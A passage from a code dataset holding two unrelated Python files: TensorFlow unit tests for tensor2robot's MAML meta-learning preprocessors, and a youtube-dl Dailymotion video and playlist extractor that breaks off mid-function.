# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as python3
"""Tests for robotics.learning.estimator_models.meta_learning.preprocessors."""
import functools
from absl.testing import parameterized
import numpy as np
import six
from six.moves import range
from tensor2robot.meta_learning import preprocessors
from tensor2robot.preprocessors import abstract_preprocessor
from tensor2robot.utils import tensorspec_utils as utils
import tensorflow.compat.v1 as tf
from tensorflow.contrib import framework as contrib_framework
nest = contrib_framework.nest
TSpec = utils.TensorSpecStruct
_RANDOM_SEED = 1234
_DEFAULT_IN_IMAGE_SHAPE = (640, 512, 3)
_DEFAULT_OUT_IMAGE_SHAPE = (256, 320, 3)
_DEFAULT_ACTION_SHAPE = (5,)
_DEFAULT_REWARD_SHAPE = (1,)
class MockBasePreprocessor(abstract_preprocessor.AbstractPreprocessor):
  """Minimal base preprocessor used to exercise the meta-learning wrappers.

  Inputs are a jpeg-encoded uint8 image plus a float32 action vector; the
  preprocess step converts the image to float32, keeps the original around as
  an optional feature and resizes the image to the output shape.
  """

  @staticmethod
  def _action_spec():
    # The action spec is identical on the input and output side.
    return utils.ExtendedTensorSpec(
        shape=_DEFAULT_ACTION_SHAPE,
        dtype=tf.float32,
        is_optional=False,
        name='state/action')

  @staticmethod
  def _reward_spec():
    # The reward label spec is identical on the input and output side.
    return utils.ExtendedTensorSpec(
        shape=_DEFAULT_REWARD_SHAPE,
        dtype=tf.float32,
        is_optional=False,
        name='reward')

  def get_in_feature_specification(self, mode):
    """Raw input features: jpeg image and action vector."""
    del mode
    spec = TSpec()
    spec.image = utils.ExtendedTensorSpec(
        shape=_DEFAULT_IN_IMAGE_SHAPE,
        dtype=tf.uint8,
        is_optional=False,
        data_format='jpeg',
        name='state/image')
    spec.action = self._action_spec()
    return spec

  def get_out_feature_specification(self, mode):
    """Preprocessed features: resized float image, optional original, action."""
    del mode
    spec = TSpec()
    spec.image = utils.ExtendedTensorSpec(
        shape=_DEFAULT_OUT_IMAGE_SHAPE,
        dtype=tf.float32,
        is_optional=False,
        name='state/image')
    spec.original_image = utils.ExtendedTensorSpec(
        shape=_DEFAULT_IN_IMAGE_SHAPE, dtype=tf.float32, is_optional=True)
    spec.action = self._action_spec()
    return spec

  def get_in_label_specification(self, mode):
    """Input labels: scalar reward."""
    del mode
    spec = TSpec()
    spec.reward = self._reward_spec()
    return spec

  def get_out_label_specification(self, mode):
    """Output labels: scalar reward, unchanged by preprocessing."""
    del mode
    spec = TSpec()
    spec.reward = self._reward_spec()
    return spec

  def _preprocess_fn(self, features, labels, mode):
    """Converts the image to float32 and resizes it to the output spec shape."""
    features.original_image = tf.image.convert_image_dtype(
        features.image, tf.float32)
    target_size = self.get_out_feature_specification(mode).image.shape[:2]
    features.image = tf.image.resize_bilinear(
        features.original_image, size=target_size)
    return features, labels
class PreprocessorsTest(tf.test.TestCase, parameterized.TestCase):
  """Tests for MAMLPreprocessorV2 and FixedLenMetaExamplePreprocessor."""

  def _create_mock_tensors(self,
                           base_preprocessor,
                           batch_size,
                           mode=tf.estimator.ModeKeys.TRAIN):
    """Creates deterministic random numpy (features, labels) fixtures."""
    # Seed numpy so every test sees identical mock data.
    np.random.seed(_RANDOM_SEED)
    features = utils.make_random_numpy(
        base_preprocessor.get_in_feature_specification(mode),
        batch_size=batch_size)
    labels = utils.make_random_numpy(
        base_preprocessor.get_in_label_specification(mode),
        batch_size=batch_size)
    return (features, labels)

  def _init_mock(self, batch_size, mode=tf.estimator.ModeKeys.TRAIN):
    """Returns (MAMLPreprocessorV2, (features, labels)) test fixtures."""
    base_preprocessor = MockBasePreprocessor()
    maml_preprocessor = preprocessors.MAMLPreprocessorV2(
        base_preprocessor=MockBasePreprocessor())
    mock_tensors = self._create_mock_tensors(base_preprocessor, batch_size,
                                             mode)
    return maml_preprocessor, mock_tensors

  @parameterized.parameters((1, 1), (1, 2), (2, 1), (2, 2))
  def test_maml_preprocessor_v2_meta_map_fn_raises(
      self, num_condition_samples_per_task, num_inference_samples_per_task):
    """create_meta_map_fn and mapping must raise on invalid sizes/shapes."""
    batch_size = (
        num_condition_samples_per_task + num_inference_samples_per_task)
    init_mock = self._init_mock(2 * batch_size)
    maml_preprocessor, mock_tensors = init_mock
    # Create a failure case for not enough data in the batch.
    dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
    # Note, if drop_remainder = False, the resulting dataset has no static
    # shape which is required for the meta preprocessing.
    dataset = dataset.batch(batch_size - 1, drop_remainder=True)
    # Trigger raise conditions for create_meta_map_fn due to
    # num_*_samples_per_task being None or not > 0.
    with self.assertRaises(ValueError):
      map_fn = maml_preprocessor.create_meta_map_fn(
          None, num_inference_samples_per_task)
    with self.assertRaises(ValueError):
      map_fn = maml_preprocessor.create_meta_map_fn(
          num_condition_samples_per_task, None)
    with self.assertRaises(ValueError):
      map_fn = maml_preprocessor.create_meta_map_fn(
          -num_condition_samples_per_task, num_inference_samples_per_task)
    with self.assertRaises(ValueError):
      map_fn = maml_preprocessor.create_meta_map_fn(
          num_condition_samples_per_task, -num_inference_samples_per_task)
    # A valid map_fn must still fail on a batch that is one element short.
    map_fn = maml_preprocessor.create_meta_map_fn(
        num_condition_samples_per_task, num_inference_samples_per_task)
    with self.assertRaises(ValueError):
      dataset.map(map_func=map_fn, num_parallel_calls=1)
    # Create a failure case for too many examples in a batch.
    dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
    # Note, if drop_remainder = False, the resulting dataset has no static
    # shape which is required for the meta preprocessing.
    dataset = dataset.batch(batch_size + 1, drop_remainder=True)
    map_fn = maml_preprocessor.create_meta_map_fn(
        num_condition_samples_per_task, num_inference_samples_per_task)
    with self.assertRaises(ValueError):
      dataset.map(map_func=map_fn, num_parallel_calls=1)
    # Create a failure case because the batch_size is not known at graph
    # construction time.
    dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
    # Note, if drop_remainder = False, the resulting dataset has no static
    # shape which is required for the meta preprocessing.
    dataset = dataset.batch(batch_size + 1, drop_remainder=False)
    map_fn = maml_preprocessor.create_meta_map_fn(
        num_condition_samples_per_task, num_inference_samples_per_task)
    with self.assertRaises(ValueError):
      dataset.map(map_func=map_fn, num_parallel_calls=1)

  @parameterized.parameters((1, 1), (1, 2), (2, 1), (2, 2))
  def test_maml_preprocessor_v2_meta_map_fn(
      self, num_condition_samples_per_task, num_inference_samples_per_task):
    """The meta map_fn splits a batch into condition/inference partitions."""
    batch_size = (
        num_condition_samples_per_task + num_inference_samples_per_task)
    init_mock = self._init_mock(2 * batch_size)
    maml_preprocessor, mock_tensors = init_mock
    with self.session() as sess:
      dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
      # Note, if drop_remainder = False, the resulting dataset has no static
      # shape which is required for the meta preprocessing.
      dataset = dataset.batch(batch_size, drop_remainder=True)
      map_fn = maml_preprocessor.create_meta_map_fn(
          num_condition_samples_per_task, num_inference_samples_per_task)
      dataset = dataset.map(map_func=map_fn, num_parallel_calls=1)
      raw_meta_features, raw_meta_labels = dataset.make_one_shot_iterator(
      ).get_next()
      np_raw_meta_features, np_raw_meta_labels = sess.run(
          [raw_meta_features, raw_meta_labels])
      ref_features, ref_labels = mock_tensors
      # Condition and inference must expose the same feature keys.
      self.assertEqual(
          list(np_raw_meta_features.condition.features.keys()),
          list(np_raw_meta_features.inference.features.keys()))
      # The first num_condition_samples_per_task elements go to condition,
      # the remainder of the inner batch to inference.
      for feature_name in np_raw_meta_features.condition.features.keys():
        np.testing.assert_array_almost_equal(
            np_raw_meta_features.condition.features[feature_name],
            ref_features[feature_name][:num_condition_samples_per_task])
        np.testing.assert_array_almost_equal(
            np_raw_meta_features.inference.features[feature_name],
            ref_features[feature_name]
            [num_condition_samples_per_task:batch_size])
      # The labels and the condition labels have to have the same keys.
      self.assertEqual(
          list(np_raw_meta_features.condition.labels.keys()),
          list(np_raw_meta_labels.keys()))
      for label_name in np_raw_meta_features.condition.labels.keys():
        np.testing.assert_array_almost_equal(
            np_raw_meta_features.condition.labels[label_name],
            ref_labels[label_name][:num_condition_samples_per_task])
        np.testing.assert_array_almost_equal(
            np_raw_meta_labels[label_name],
            ref_labels[label_name][num_condition_samples_per_task:batch_size])

  @parameterized.parameters((1, 1, 1), (1, 2, 2), (2, 1, 2), (1, 2, 3),
                            (2, 1, 3), (2, 2, 3))
  def test_maml_preprocessor_v2_preprocess(self, num_condition_samples_per_task,
                                           num_inference_samples_per_task,
                                           outer_batch_size):
    """End-to-end preprocess over an outer (task) and inner (sample) batch."""
    inner_batch_size = (
        num_condition_samples_per_task + num_inference_samples_per_task)
    init_mock = self._init_mock(outer_batch_size * inner_batch_size)
    maml_preprocessor, mock_tensors = init_mock
    with self.session() as sess:
      dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
      # Note, if drop_remainder = False, the resulting dataset has no static
      # shape which is required for the meta preprocessing.
      dataset = dataset.batch(inner_batch_size, drop_remainder=True)
      map_fn = maml_preprocessor.create_meta_map_fn(
          num_condition_samples_per_task, num_inference_samples_per_task)
      dataset = dataset.map(map_func=map_fn, num_parallel_calls=1)
      # Note, if drop_remainder = False, the resulting dataset has no static
      # shape which is required for the meta preprocessing.
      dataset = dataset.batch(outer_batch_size, drop_remainder=True)
      preprocess_fn = functools.partial(
          maml_preprocessor.preprocess, mode=tf.estimator.ModeKeys.TRAIN)
      dataset = dataset.map(map_func=preprocess_fn, num_parallel_calls=1)
      raw_meta_features, raw_meta_labels = dataset.make_one_shot_iterator(
      ).get_next()
      np_raw_meta_features, np_raw_meta_labels = sess.run(
          [raw_meta_features, raw_meta_labels])
      ref_features, ref_labels = mock_tensors
      self.assertEqual(
          list(np_raw_meta_features.condition.features.keys()),
          list(np_raw_meta_features.inference.features.keys()))
      # The image has been resized. Therefore, we ensure that its shape is
      # correct. Note, we have to strip the outer and inner batch dimensions.
      self.assertEqual(np_raw_meta_features.condition.features.image.shape[2:],
                       _DEFAULT_OUT_IMAGE_SHAPE)
      self.assertEqual(np_raw_meta_features.inference.features.image.shape[2:],
                       _DEFAULT_OUT_IMAGE_SHAPE)
      # The following tests are important to ensure that our reshaping,
      # flattening and unflattening actually preserves all information.
      # We can only test those two since the image has been resized.
      # Since the featurename has been altered during preprocessing we have
      # to index the reference data differently.
      # Further, we only test the first batch, since everything afterwards
      # would require more index slicing :).
      # For the image we have to convert the original data into float32 since
      # that is the required conversion for our preprocessor.
      np.testing.assert_array_almost_equal(
          np_raw_meta_features.condition.features['original_image'][0],
          ref_features['image'][:num_condition_samples_per_task].astype(
              np.float32) / 255)
      np.testing.assert_array_almost_equal(
          np_raw_meta_features.inference.features['original_image'][0],
          ref_features['image'][num_condition_samples_per_task:inner_batch_size]
          .astype(np.float32) / 255)
      np.testing.assert_array_almost_equal(
          np_raw_meta_features.condition.features['action'][0],
          ref_features['action'][:num_condition_samples_per_task])
      np.testing.assert_array_almost_equal(
          np_raw_meta_features.inference.features['action'][0],
          ref_features['action']
          [num_condition_samples_per_task:inner_batch_size])
      # The labels and the condition labels have to have the same keys.
      self.assertEqual(
          list(np_raw_meta_features.condition.labels.keys()),
          list(np_raw_meta_labels.keys()))
      for label_name in np_raw_meta_features.condition.labels.keys():
        np.testing.assert_array_almost_equal(
            np_raw_meta_features.condition.labels[label_name][0],
            ref_labels[label_name][:num_condition_samples_per_task])
        np.testing.assert_array_almost_equal(
            np_raw_meta_labels[label_name][0], ref_labels[label_name]
            [num_condition_samples_per_task:inner_batch_size])

  def test_create_metaexample_spec(self):
    """create_metaexample_spec expands each flat key into per-episode keys."""
    feature_spec = TSpec()
    feature_spec.image = utils.ExtendedTensorSpec(
        shape=_DEFAULT_IN_IMAGE_SHAPE,
        dtype=tf.uint8,
        is_optional=False,
        data_format='jpeg',
        name='state/image')
    feature_spec.action = utils.ExtendedTensorSpec(
        shape=_DEFAULT_ACTION_SHAPE,
        dtype=tf.float32,
        is_optional=False,
        name='state/action')
    num_samples_in_task = 3
    metaexample_spec = preprocessors.create_metaexample_spec(
        feature_spec, num_samples_in_task, 'condition')
    flat_feature_spec = utils.flatten_spec_structure(feature_spec)
    # One spec per (key, episode index) pair.
    self.assertLen(
        list(metaexample_spec.keys()),
        num_samples_in_task * len(list(flat_feature_spec.keys())))
    for key in flat_feature_spec:
      for i in range(num_samples_in_task):
        meta_example_key = six.ensure_str(key) + '/{:d}'.format(i)
        self.assertIn(meta_example_key, list(metaexample_spec.keys()))
        self.assertTrue(
            six.ensure_str(metaexample_spec[meta_example_key].name).startswith(
                'condition_ep'))

  def test_stack_intratask_episodes(self):
    """stack_intra_task_episodes folds per-episode keys into one extra axis."""
    feature_spec = TSpec()
    feature_spec.image = utils.ExtendedTensorSpec(
        shape=_DEFAULT_IN_IMAGE_SHAPE,
        dtype=tf.uint8,
        is_optional=False,
        data_format='jpeg',
        name='state/image')
    feature_spec.action = utils.ExtendedTensorSpec(
        shape=_DEFAULT_ACTION_SHAPE,
        dtype=tf.float32,
        is_optional=False,
        name='state/action')
    batch_size = 2
    num_samples_in_task = 3
    metaexample_spec = preprocessors.create_metaexample_spec(
        feature_spec, num_samples_in_task, 'condition')
    tensors = utils.make_random_numpy(metaexample_spec, batch_size)
    out_tensors = preprocessors.stack_intra_task_episodes(
        tensors, num_samples_in_task)
    # Stacking inserts the episode dimension right after the batch dimension.
    self.assertEqual(
        out_tensors.image.shape,
        (batch_size, num_samples_in_task) + _DEFAULT_IN_IMAGE_SHAPE)
    self.assertEqual(
        out_tensors.action.shape,
        (batch_size, num_samples_in_task) + _DEFAULT_ACTION_SHAPE)

  @parameterized.parameters((1, 1, 1), (1, 2, 2), (2, 1, 2), (1, 2, 3),
                            (2, 1, 3), (2, 3, 1))
  def test_meta_example_preprocess(
      self,
      num_condition_samples_per_task,
      num_inference_samples_per_task,
      outer_batch_size):
    """FixedLenMetaExamplePreprocessor round-trips per-episode data."""
    base_preprocessor = MockBasePreprocessor()
    meta_example_preprocessor = preprocessors.FixedLenMetaExamplePreprocessor(
        base_preprocessor=base_preprocessor,
        num_condition_samples_per_task=num_condition_samples_per_task,
        num_inference_samples_per_task=num_inference_samples_per_task)
    mock_tensors = self._create_mock_tensors(
        meta_example_preprocessor, outer_batch_size)
    with self.session() as sess:
      dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
      dataset = dataset.batch(outer_batch_size, drop_remainder=True)
      preprocess_fn = functools.partial(
          meta_example_preprocessor.preprocess,
          mode=tf.estimator.ModeKeys.TRAIN)
      dataset = dataset.map(map_func=preprocess_fn, num_parallel_calls=1)
      raw_meta_features, raw_meta_labels = (
          dataset.make_one_shot_iterator().get_next())
      np_raw_meta_features, np_raw_meta_labels = sess.run(
          [raw_meta_features, raw_meta_labels])
      ref_features, ref_labels = mock_tensors
      self.assertEqual(
          list(np_raw_meta_features.condition.features.keys()),
          list(np_raw_meta_features.inference.features.keys()))
      # The labels and the condition labels have to have the same keys.
      self.assertEqual(
          list(np_raw_meta_features.condition.labels.keys()),
          list(np_raw_meta_labels.keys()))
      # The image has been resized. Therefore, we ensure that its shape is
      # correct. Note, we have to strip the outer and inner batch dimensions.
      self.assertEqual(
          np_raw_meta_features.condition.features.image.shape[2:],
          _DEFAULT_OUT_IMAGE_SHAPE)
      self.assertEqual(
          np_raw_meta_features.inference.features.image.shape[2:],
          _DEFAULT_OUT_IMAGE_SHAPE)
      # Each stacked episode slice must match its flat per-episode input key.
      for i in range(num_condition_samples_per_task):
        np.testing.assert_array_almost_equal(
            np_raw_meta_features.condition.features['action'][:, i, Ellipsis],
            ref_features['condition/features/action/{:d}'.format(i)])
        for label_name in np_raw_meta_features.condition.labels.keys():
          np.testing.assert_array_almost_equal(
              np_raw_meta_features.condition.labels[label_name][:, i, Ellipsis],
              ref_features['condition/labels/{:s}/{:d}'.format(
                  label_name, i)])
      for i in range(num_inference_samples_per_task):
        np.testing.assert_array_almost_equal(
            np_raw_meta_features.inference.features['action'][:, i, Ellipsis],
            ref_features['inference/features/action/{:d}'.format(i)])
        for label_name in np_raw_meta_features.condition.labels.keys():
          np.testing.assert_array_almost_equal(
              np_raw_meta_labels[label_name][:, i, Ellipsis],
              ref_labels[six.ensure_str(label_name) + '/{:d}'.format(i)])
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
  tf.test.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# coding: utf-8
from __future__ import unicode_literals
import re
import json
import itertools
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
determine_ext,
int_or_none,
parse_iso8601,
str_to_int,
unescapeHTML,
)
class DailymotionBaseInfoExtractor(InfoExtractor):
    """Shared helpers for Dailymotion extractors.

    Page downloads go through a request that disables Dailymotion's family
    filter so age-restricted content stays visible.
    """

    @staticmethod
    def _build_request(url):
        """Build a request with the family filter disabled"""
        req = compat_urllib_request.Request(url)
        req.add_header('Cookie', 'family_filter=off; ff=off')
        return req

    def _download_webpage_handle_no_ff(self, url, *args, **kwargs):
        """Like _download_webpage_handle, with the family filter disabled."""
        return self._download_webpage_handle(
            self._build_request(url), *args, **kwargs)

    def _download_webpage_no_ff(self, url, *args, **kwargs):
        """Like _download_webpage, with the family filter disabled."""
        return self._download_webpage(
            self._build_request(url), *args, **kwargs)
class DailymotionIE(DailymotionBaseInfoExtractor):
    """Extractor for single Dailymotion videos.

    Tries the modern "player v5" JSON metadata first, then a Vevo embed,
    then falls back to the legacy embedded-player info object.
    """
    _VALID_URL = r'(?i)(?:https?://)?(?:(www|touch)\.)?dailymotion\.[a-z]{2,3}/(?:(embed|#)/)?video/(?P<id>[^/?_]+)'
    IE_NAME = 'dailymotion'

    # (info-object key, format_id) pairs for the legacy player fallback,
    # ordered roughly by ascending quality.
    _FORMATS = [
        ('stream_h264_ld_url', 'ld'),
        ('stream_h264_url', 'standard'),
        ('stream_h264_hq_url', 'hq'),
        ('stream_h264_hd_url', 'hd'),
        ('stream_h264_hd1080_url', 'hd180'),
    ]

    _TESTS = [
        {
            'url': 'https://www.dailymotion.com/video/x2iuewm_steam-machine-models-pricing-listed-on-steam-store-ign-news_videogames',
            'md5': '2137c41a8e78554bb09225b8eb322406',
            'info_dict': {
                'id': 'x2iuewm',
                'ext': 'mp4',
                'title': 'Steam Machine Models, Pricing Listed on Steam Store - IGN News',
                'description': 'Several come bundled with the Steam Controller.',
                'thumbnail': 're:^https?:.*\.(?:jpg|png)$',
                'duration': 74,
                'timestamp': 1425657362,
                'upload_date': '20150306',
                'uploader': 'IGN',
                'uploader_id': 'xijv66',
                'age_limit': 0,
                'view_count': int,
                'comment_count': int,
            }
        },
        # Vevo video
        {
            'url': 'http://www.dailymotion.com/video/x149uew_katy-perry-roar-official_musi',
            'info_dict': {
                'title': 'Roar (Official)',
                'id': 'USUV71301934',
                'ext': 'mp4',
                'uploader': 'Katy Perry',
                'upload_date': '20130905',
            },
            'params': {
                'skip_download': True,
            },
            'skip': 'VEVO is only available in some countries',
        },
        # age-restricted video
        {
            'url': 'http://www.dailymotion.com/video/xyh2zz_leanna-decker-cyber-girl-of-the-year-desires-nude-playboy-plus_redband',
            'md5': '0d667a7b9cebecc3c89ee93099c4159d',
            'info_dict': {
                'id': 'xyh2zz',
                'ext': 'mp4',
                'title': 'Leanna Decker - Cyber Girl Of The Year Desires Nude [Playboy Plus]',
                'uploader': 'HotWaves1012',
                'age_limit': 18,
            }
        }
    ]

    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage_no_ff(
            'https://www.dailymotion.com/video/%s' % video_id, video_id)
        age_limit = self._rta_search(webpage)
        description = self._og_search_description(webpage) or self._html_search_meta(
            'description', webpage, 'description')
        # View/comment counts come from itemprop meta tags; both are optional.
        view_count = str_to_int(self._search_regex(
            [r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserPlays:(\d+)"',
             r'video_views_count[^>]+>\s+([\d\.,]+)'],
            webpage, 'view count', fatal=False))
        comment_count = int_or_none(self._search_regex(
            r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserComments:(\d+)"',
            webpage, 'comment count', fatal=False))
        # Preferred path: the modern player v5 embeds its config as JSON.
        player_v5 = self._search_regex(
            r'playerV5\s*=\s*dmp\.create\([^,]+?,\s*({.+?})\);',
            webpage, 'player v5', default=None)
        if player_v5:
            player = self._parse_json(player_v5, video_id)
            metadata = player['metadata']
            formats = []
            for quality, media_list in metadata['qualities'].items():
                for media in media_list:
                    media_url = media.get('url')
                    if not media_url:
                        continue
                    type_ = media.get('type')
                    # Lumberjack manifests are not downloadable media.
                    if type_ == 'application/vnd.lumberjack.manifest':
                        continue
                    if type_ == 'application/x-mpegURL' or determine_ext(media_url) == 'm3u8':
                        formats.extend(self._extract_m3u8_formats(
                            media_url, video_id, 'mp4', m3u8_id='hls'))
                    else:
                        f = {
                            'url': media_url,
                            'format_id': quality,
                        }
                        # Resolution is encoded in the URL as H264-<w>x<h>.
                        m = re.search(r'H264-(?P<width>\d+)x(?P<height>\d+)', media_url)
                        if m:
                            f.update({
                                'width': int(m.group('width')),
                                'height': int(m.group('height')),
                            })
                        formats.append(f)
            self._sort_formats(formats)
            title = metadata['title']
            duration = int_or_none(metadata.get('duration'))
            timestamp = int_or_none(metadata.get('created_time'))
            thumbnail = metadata.get('poster_url')
            uploader = metadata.get('owner', {}).get('screenname')
            uploader_id = metadata.get('owner', {}).get('id')
            subtitles = {}
            for subtitle_lang, subtitle in metadata.get('subtitles', {}).get('data', {}).items():
                subtitles[subtitle_lang] = [{
                    'ext': determine_ext(subtitle_url),
                    'url': subtitle_url,
                } for subtitle_url in subtitle.get('urls', [])]
            return {
                'id': video_id,
                'title': title,
                'description': description,
                'thumbnail': thumbnail,
                'duration': duration,
                'timestamp': timestamp,
                'uploader': uploader,
                'uploader_id': uploader_id,
                'age_limit': age_limit,
                'view_count': view_count,
                'comment_count': comment_count,
                'formats': formats,
                'subtitles': subtitles,
            }
        # vevo embed
        vevo_id = self._search_regex(
            r'<link rel="video_src" href="[^"]*?vevo.com[^"]*?video=(?P<id>[\w]*)',
            webpage, 'vevo embed', default=None)
        if vevo_id:
            return self.url_result('vevo:%s' % vevo_id, 'Vevo')
        # fallback old player
        embed_page = self._download_webpage_no_ff(
            'https://www.dailymotion.com/embed/video/%s' % video_id,
            video_id, 'Downloading embed page')
        timestamp = parse_iso8601(self._html_search_meta(
            'video:release_date', webpage, 'upload date'))
        info = self._parse_json(
            self._search_regex(
                r'var info = ({.*?}),$', embed_page,
                'video info', flags=re.MULTILINE),
            video_id)
        if info.get('error') is not None:
            msg = 'Couldn\'t get video, Dailymotion says: %s' % info['error']['title']
            raise ExtractorError(msg, expected=True)
        formats = []
        for (key, format_id) in self._FORMATS:
            video_url = info.get(key)
            if video_url is not None:
                m_size = re.search(r'H264-(\d+)x(\d+)', video_url)
                if m_size is not None:
                    width, height = map(int_or_none, (m_size.group(1), m_size.group(2)))
                else:
                    width, height = None, None
                formats.append({
                    'url': video_url,
                    'ext': 'mp4',
                    'format_id': format_id,
                    'width': width,
                    'height': height,
                })
        self._sort_formats(formats)
        # subtitles
        video_subtitles = self.extract_subtitles(video_id, webpage)
        title = self._og_search_title(webpage, default=None)
        if title is None:
            title = self._html_search_regex(
                r'(?s)<span\s+id="video_title"[^>]*>(.*?)</span>', webpage,
                'title')
        return {
            'id': video_id,
            'formats': formats,
            'uploader': info['owner.screenname'],
            'timestamp': timestamp,
            'title': title,
            'description': description,
            'subtitles': video_subtitles,
            'thumbnail': info['thumbnail_url'],
            'age_limit': age_limit,
            'view_count': view_count,
            'duration': info['duration']
        }

    def _get_subtitles(self, video_id, webpage):
        """Fetches subtitle metadata from the Dailymotion API; {} on failure."""
        try:
            sub_list = self._download_webpage(
                'https://api.dailymotion.com/video/%s/subtitles?fields=id,language,url' % video_id,
                video_id, note=False)
        except ExtractorError as err:
            self._downloader.report_warning('unable to download video subtitles: %s' % compat_str(err))
            return {}
        info = json.loads(sub_list)
        if (info['total'] > 0):
            sub_lang_list = dict((l['language'], [{'url': l['url'], 'ext': 'srt'}]) for l in info['list'])
            return sub_lang_list
        self._downloader.report_warning('video doesn\'t have subtitles')
        return {}
class DailymotionPlaylistIE(DailymotionBaseInfoExtractor):
    """Extractor for Dailymotion playlists; paginates until no next arrow."""
    IE_NAME = 'dailymotion:playlist'
    _VALID_URL = r'(?:https?://)?(?:www\.)?dailymotion\.[a-z]{2,3}/playlist/(?P<id>.+?)/'
    # Matches the "next page" arrow in the pagination widget.
    _MORE_PAGES_INDICATOR = r'(?s)<div class="pages[^"]*">.*?<a\s+class="[^"]*?icon-arrow_right[^"]*?"'
    _PAGE_TEMPLATE = 'https://www.dailymotion.com/playlist/%s/%s'
    _TESTS = [{
        'url': 'http://www.dailymotion.com/playlist/xv4bw_nqtv_sport/1#video=xl8v3q',
        'info_dict': {
            'title': 'SPORT',
            'id': 'xv4bw_nqtv_sport',
        },
        'playlist_mincount': 20,
    }]

    def _extract_entries(self, id):
        """Yields url_result entries for every unique video across all pages."""
        # Deduplicate videos and detect redirect loops via already-seen URLs.
        video_ids = set()
        processed_urls = set()
        for pagenum in itertools.count(1):
            page_url = self._PAGE_TEMPLATE % (id, pagenum)
            webpage, urlh = self._download_webpage_handle_no_ff(
                page_url, id, 'Downloading page %s' % pagenum)
            # The site redirects past-the-end page numbers back to an earlier
            # page; stop when we land on a URL we have already processed.
            if urlh.geturl() in processed_urls:
                self.report_warning('Stopped at duplicated page %s, which is the same as %s' % (
                    page_url, urlh.geturl()), id)
                break
            processed_urls.add(urlh.geturl())
            for video_id in re.findall(r'data-xid="(.+?)"', webpage):
                if video_id not in video_ids:
                    yield self.url_result('http://www.dailymotion.com/video/%s' % video_id, 'Dailymotion')
                    video_ids.add(video_id)
            if re.search(self._MORE_PAGES_INDICATOR, webpage) is None:
                break

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        playlist_id = mobj.group('id')
        webpage = self._download_webpage(url, playlist_id)
        return {
            '_type': 'playlist',
            'id': playlist_id,
            'title': self._og_search_title(webpage),
            'entries': self._extract_entries(playlist_id),
        }
class DailymotionUserIE(DailymotionPlaylistIE):
    """Extracts all uploads of a Dailymotion user as a playlist."""
    IE_NAME = 'dailymotion:user'
    _VALID_URL = r'https?://(?:www\.)?dailymotion\.[a-z]{2,3}/(?!(?:embed|#|video|playlist)/)(?:(?:old/)?user/)?(?P<user>[^/]+)'
    _PAGE_TEMPLATE = 'http://www.dailymotion.com/user/%s/%s'
    _TESTS = [{
        'url': 'https://www.dailymotion.com/user/nqtv',
        'info_dict': {
            'id': 'nqtv',
            'title': 'Rémi Gaillard',
        },
        'playlist_mincount': 100,
    }, {
        'url': 'http://www.dailymotion.com/user/UnderProject',
        'info_dict': {
            'id': 'UnderProject',
            'title': 'UnderProject',
        },
        'playlist_mincount': 1800,
        'expected_warnings': [
            'Stopped at duplicated page',
        ],
        'skip': 'Takes too long time',
    }]

    def _real_extract(self, url):
        """Resolves the user name, scrapes the display name, yields entries."""
        user = re.match(self._VALID_URL, url).group('user')
        page = self._download_webpage(
            'https://www.dailymotion.com/user/%s' % user, user)
        full_user = unescapeHTML(self._html_search_regex(
            r'<a class="nav-image" title="([^"]+)" href="/%s">' % re.escape(user),
            page, 'user'))
        return {
            '_type': 'playlist',
            'id': user,
            'title': full_user,
            'entries': self._extract_entries(user),
        }
class DailymotionCloudIE(DailymotionBaseInfoExtractor):
    """Extractor for Dailymotion Cloud (dmcloud.net) embeds."""
    _VALID_URL_PREFIX = r'http://api\.dmcloud\.net/(?:player/)?embed/'
    _VALID_URL = r'%s[^/]+/(?P<id>[^/?]+)' % _VALID_URL_PREFIX
    _VALID_EMBED_URL = r'%s[^/]+/[^\'"]+' % _VALID_URL_PREFIX

    _TESTS = [{
        # From http://www.francetvinfo.fr/economie/entreprises/les-entreprises-familiales-le-secret-de-la-reussite_933271.html
        # Tested at FranceTvInfo_2
        'url': 'http://api.dmcloud.net/embed/4e7343f894a6f677b10006b4/556e03339473995ee145930c?auth=1464865870-0-jyhsm84b-ead4c701fb750cf9367bf4447167a3db&autoplay=1',
        'only_matching': True,
    }, {
        # http://www.francetvinfo.fr/societe/larguez-les-amarres-le-cobaturage-se-developpe_980101.html
        'url': 'http://api.dmcloud.net/player/embed/4e7343f894a6f677b10006b4/559545469473996d31429f06?auth=1467430263-0-90tglw2l-a3a4b64ed41efe48d7fccad85b8b8fda&autoplay=1',
        'only_matching': True,
    }]

    @classmethod
    def _extract_dmcloud_url(cls, webpage):
        """Returns the first Dailymotion Cloud embed URL in `webpage`, or None.

        Fix: the first parameter of this @classmethod was misleadingly named
        `self`; it receives the class, so it is now named `cls` per convention.
        """
        # Embeds appear either as an iframe src ...
        mobj = re.search(r'<iframe[^>]+src=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL, webpage)
        if mobj:
            return mobj.group(1)
        # ... or stashed in a hidden input used by some French TV sites.
        mobj = re.search(
            r'<input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL,
            webpage)
        if mobj:
            return mobj.group(1)
        # Implicitly returns None when no embed is present.

    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage_no_ff(url, video_id)
        title = self._html_search_regex(r'<title>([^>]+)</title>', webpage, 'title')
        video_info = self._parse_json(self._search_regex(
            r'var\s+info\s*=\s*([^;]+);', webpage, 'video info'), video_id)
